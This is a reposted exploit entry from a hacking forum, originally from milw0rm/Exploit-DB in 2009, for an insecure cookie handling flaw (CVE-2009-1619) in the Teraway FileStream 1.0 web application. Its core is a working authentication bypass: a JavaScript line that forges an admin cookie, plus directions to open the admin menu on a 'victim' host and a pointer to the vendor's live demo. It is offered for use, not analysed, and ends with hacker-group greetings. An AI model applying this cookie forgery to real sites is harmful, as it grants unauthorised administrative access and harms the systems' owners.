Exploit Teraway FileStream 1.0 - Insecure Cookie Handling

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8551
Проверка EDB
  1. Пройдено
Автор
THE G0BL!N
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-1619
Дата публикации
2009-04-27
Код:
-------------------------------------[+]
Homepage:http://www.teraway.com
Product: Teraway FileStream 1.0
home:www.h4ckf0ru.com
Note: Hawach x.CJP.x Ballk Ma tedirech Ihdae
Note: Ya Jma3a Ana AfLawi Horr
-------------------------------------
Teraway FileStream 1.0 Insecure Cookie Handling Vuln
-------------------------------------
Exploit:
--------

javascript:document.cookie="twFSadmin=1;path=/";
Then Go to  http://victim/path/menu.asp

demo
----
http://www.teraway.com/filestream/demo/login.asp


--------------------------------------------------
 Greetz to :
[+] Super_Cristal (My Master) Dos-Dz Team Snakes TeaM
SuB-ZeRo x.CJP.x Mr.tro0oqy - Cyber-Zone-  ZoRLu
And ALL Members Of anti-intruders.org  
ALL My Friends (Dz)
[+]-------------------------------------[+] 

# milw0rm.com [2009-04-27]
 
Источник
www.exploit-db.com

Похожие темы